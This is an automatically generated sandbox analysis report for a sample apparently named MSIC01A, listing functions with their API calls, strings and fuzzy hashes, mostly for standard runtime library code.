                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                        • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                        • Instruction ID: f5e1b77563629a4f9031f04cc2c7aa6ca7a058f5cc454c1f3c89c179755d7e2d
                                                                                                                                                                        • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E32AC34E0021ADFCF28CF98C991ABEB7B5EF55314F284169DD45A7305DA32AE46DB80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F692A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7c80f69da2586a31788134cf1d1ff637f39bf68e53c2c04abeb3e4c3a423148f
                                                                                                                                                                        • Instruction ID: b7b6568724645beba5fba9c8eadae0439f59ac61d9fed8c609fd2d85b1a33cfd
                                                                                                                                                                        • Opcode Fuzzy Hash: 7c80f69da2586a31788134cf1d1ff637f39bf68e53c2c04abeb3e4c3a423148f
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D32F122D29F454DD7239634CC62379A28CEFB73D4F15D727E81AB5AA9EB3884C36101
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F5A915 Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 56f70f2eaafb2dd7f169aff675c4dc991a46e332bd82c4e4c88ac1b37ebf8247
                                                                                                                                                                        • Instruction ID: 7f33276c634c95cd9529e5da94a5b3bfe0334d2c7ea9d3ce26b9bed6bbddf0c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 56f70f2eaafb2dd7f169aff675c4dc991a46e332bd82c4e4c88ac1b37ebf8247
                                                                                                                                                                        • Instruction Fuzzy Hash: F2E1EE30A00605CFCB24CF28C580A7AB7F1FF49322B244749DE569B690D734ED5AEB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6D8D5 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3471368781-0
                                                                                                                                                                        • Opcode ID: 5c7f566d3d428003e1b64b9f3f1be23ae621736ad2d768a1532083a5e92b84f2
                                                                                                                                                                        • Instruction ID: 9c9fdc2d181d570a80fb09e32ee220c078b45ddf3d2aca4e5912a391cf2d6f1e
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c7f566d3d428003e1b64b9f3f1be23ae621736ad2d768a1532083a5e92b84f2
                                                                                                                                                                        • Instruction Fuzzy Hash: E3B10675E007458BDB38EF24CC92BB7B3A8EF44318F14452DEA82C6585EB79E945EB10
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F5C2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                        • Instruction ID: 7b4fcd279e828142535c6e40a837bff6785e1603005d0d0fc1048e4baaa3a28b
                                                                                                                                                                        • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                        • Instruction Fuzzy Hash: BD517472E00219EFDF14CF99C951AEEBBB1EF88310F19C069E915AB201C7349E54DB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F54920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                        • Instruction ID: 82a0b954b46c12b2a655464e25e4914ec426bd216faa725636215b3dc27fcbd2
                                                                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F113F7760404143D604C52DC4BA5B7E395DBC633F72D4365CA914BF55D222B9CCB600
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6AD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                        • Instruction ID: 3dd350b22b103c57bf792065a4dabbc0cca527d159e15485bc0391bfd6858d78
                                                                                                                                                                        • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                        • Instruction Fuzzy Hash: B5E08C72911238EBCB14DB98CA0498AF3ECEB84B11B15049AF601E3500D674DE00EBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F62DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                        • Instruction ID: 6e6e81255933d14ce5f632bb1196945cc361f761b642dea8321d157097e9ba09
                                                                                                                                                                        • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                        • Instruction Fuzzy Hash: C6C08C34400F0046CE2989108EB13A83354B791792F80058CC4430BA86C51EAC83FA01
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F50116 Relevance: 30.3, APIs: 20, Instructions: 287COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F5011D
                                                                                                                                                                        • collate.LIBCPMT ref: 00F50126
                                                                                                                                                                          • Part of subcall function 00F4EDF2: __EH_prolog3_GS.LIBCMT ref: 00F4EDF9
                                                                                                                                                                          • Part of subcall function 00F4EDF2: __Getcoll.LIBCPMT ref: 00F4EE5D
                                                                                                                                                                        • __Getcoll.LIBCPMT ref: 00F5016C
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50180
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50195
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F501D3
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F501E6
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5022C
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50260
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5031B
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5032E
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5034B
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50368
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50385
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F502BD
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • numpunct.LIBCPMT ref: 00F503C4
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F503D4
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50418
                                                                                                                                                                          • Part of subcall function 00F36330: LocalAlloc.KERNEL32(00000040,?,00F40E04,00000020,?,?,00F39942,00000000,72A902E8,?,?,?,?,00F750DD,000000FF), ref: 00F36336
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5042B
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50448
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3717464618-0
                                                                                                                                                                        • Opcode ID: 6e77e970c2613771671f229a03f8fbb4093420540f53e6d14ee3edb759d457b9
                                                                                                                                                                        • Instruction ID: aa78346c2aa716e0a0439680fd1444c1d8fc99038c2461ebf04396bd0b60ef30
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e77e970c2613771671f229a03f8fbb4093420540f53e6d14ee3edb759d457b9
                                                                                                                                                                        • Instruction Fuzzy Hash: F191B671D012116BEB207BB44C46BBF7AA8EF417B1F108429FD4DA7282DE784905B7B2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F36600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00F3667E
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366D7
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366E2
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366FE
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F367DB
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F367E7
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00F749E5), ref: 00F3682F
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F3684A
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00F749E5), ref: 00F36867
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F36891
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00F368D8
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00F3692A
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F3695C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                                                        • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                                        • API String ID: 2199533872-3004881174
                                                                                                                                                                        • Opcode ID: 8cc433a9c9aea2c60e693013b7d88818d670c67dda4114a8b657af49fcd0a51d
                                                                                                                                                                        • Instruction ID: c9d604e0b268398b842c852dd607f156e5240a35f326310439f8eebfaeb73a52
                                                                                                                                                                        • Opcode Fuzzy Hash: 8cc433a9c9aea2c60e693013b7d88818d670c67dda4114a8b657af49fcd0a51d
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BB12571D04249AFEB20DF64CC86BEFBBB5AF05720F108129E504EB2C1DB749A48D7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F52B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00F8DD3C,00000FA0,?,?,00F52B6A), ref: 00F52B98
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00F52B6A), ref: 00F52BA3
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00F52B6A), ref: 00F52BB4
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F52BC6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F52BD4
                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00F52B6A), ref: 00F52BF7
                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(00F8DD3C,00000007,?,?,00F52B6A), ref: 00F52C13
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00F52B6A), ref: 00F52C23
                                                                                                                                                                        Strings
                                                                                                                                                                        • kernel32.dll, xrefs: 00F52BAF
                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F52B9E
                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 00F52BC0
                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 00F52BCC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 2565136772-3242537097
                                                                                                                                                                        • Opcode ID: 747470fac7e550bb4e4f3f8e34fbba6116a2e7581603e1e1347cb9e959ee1d51
                                                                                                                                                                        • Instruction ID: 5f3c1c3c5ad97a37938eb315523f08950e66c4572684d0d66557e95ba1cabadb
                                                                                                                                                                        • Opcode Fuzzy Hash: 747470fac7e550bb4e4f3f8e34fbba6116a2e7581603e1e1347cb9e959ee1d51
                                                                                                                                                                        • Instruction Fuzzy Hash: AB01B572A54315ABD6213F75AC0CE667B689F827627014911FE08D22E0EBB4C845FB63
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F55CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 00F55DAC
                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00F55DCE
                                                                                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00F55EDD
                                                                                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 00F55FAF
                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00F56033
                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00F5604E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                        • API String ID: 2123188842-393685449
                                                                                                                                                                        • Opcode ID: 61be372a432dd627ba8a607e41589dab0fb3af56ef2fb2074da84d34755e732d
                                                                                                                                                                        • Instruction ID: 97e20e11d47c986da3672bf359803c85ed80c8da7a2a197d9fcc9583a45af02c
                                                                                                                                                                        • Opcode Fuzzy Hash: 61be372a432dd627ba8a607e41589dab0fb3af56ef2fb2074da84d34755e732d
                                                                                                                                                                        • Instruction Fuzzy Hash: 13B1AE32C00609EFCF18DFA4C8A19AEB7B5FF14722F144059EE15AB212D734DA59EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F34270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,72A902E8,?,?,?), ref: 00F342D2
                                                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,72A902E8,?,?,?), ref: 00F342F3
                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,72A902E8,?,?,?), ref: 00F34326
                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,72A902E8,?,?,?), ref: 00F34337
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34355
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34371
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34399
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F343B5
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F343D3
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F343EF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
